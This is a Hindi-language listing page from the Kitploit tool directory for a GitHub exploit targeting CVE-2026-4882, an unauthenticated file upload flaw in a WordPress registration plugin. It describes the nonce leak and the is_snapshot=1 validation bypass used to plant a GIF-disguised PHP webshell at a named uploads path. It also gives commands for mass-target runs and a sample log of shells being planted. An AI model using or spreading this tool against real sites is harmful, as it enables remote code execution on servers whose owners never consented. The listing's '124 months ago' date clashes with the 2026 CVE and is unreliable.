Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload | Kitploit
उपकरण/GitHubGitHub/xshadow-here/cve-2026-4882
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload

रिपॉजिटरी देखें
124 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - अनधिकृत मनमानी फ़ाइल अपलोड

विवरण :

User Registration Advanced Fields <= 1.6.20 - अनधिकृत मनमानी फ़ाइल अपलोड विवरण WordPress के लिए User Registration Advanced Fields प्लगइन (संस्करण 1.6.20 तक) uraf_profile_picture_upload_method_upload AJAX क्रिया के माध्यम से अनधिकृत मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है। प्लगइन किसी भी पृष्ठ पर जिसमें पंजीकरण फ़ॉर्म है, wp_localize_script() के माध्यम से एक वैध nonce लीक करता है, और is_snapshot=1 पैरामीटर का उपयोग करके फ़ाइल एक्सटेंशन सत्यापन को पूरी तरह से बायपास करता है। यह अनधिकृत हमलावरों को मनमानी फ़ाइलें (जैसे, GIF छवियों के रूप में प्रच्छन्न PHP वेबशेल) अपलोड करने की अनुमति देता है, जो wp-content/uploads/user_registration_uploads/temp-uploads/ में संग्रहीत होती हैं, जिससे पूर्ण दूरस्थ कोड निष्पादन (RCE) होता है।

जानकारी : CVE-2026-4882

~ CVSS स्कोर: 9.8 (गंभीर)

~ प्रभावित संस्करण: <= 1.6.20

  • शोधकर्ता : 0xd4rk5id3 - EnvoraSec

उपयोग :

एकल लक्ष्य :

  • python3 shadow.py -u https://target.com -s shadow.php

सामूहिक लक्ष्य :

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

इंटरैक्टिव मोड :

  • python3 shadow.py
  • लक्ष्य फ़ाइल का नाम इनपुट करें
  • थ्रेड 1-50 अधिकतम इनपुट करें

विशेषताएँ :

  • मल्टी-थ्रेडिंग
  • त्रुटि प्रबंधन
  • स्वचालित Nonce + फ़ॉर्म आईडी खोज
  • होमपेज और साइटमैप क्रॉलिंग (कस्टम पंजीकरण पथ)
  • ब्रूट फ़ोर्स फ़ॉर्म आईडी फ़ॉलबैक
  • स्वचालित HTTP/HTTPS रीडायरेक्ट समाधान
  • GIF89a पॉलीग्लॉट शेल अपलोड
  • सत्यापन शेल
  • स्वचालित रूप से परिणाम shell.txt में सहेजें

आउटपुट :


╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

अस्वीकरण :

यह उपकरण केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए है।

उन प्रणालियों का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।

टूल डाउनलोड करें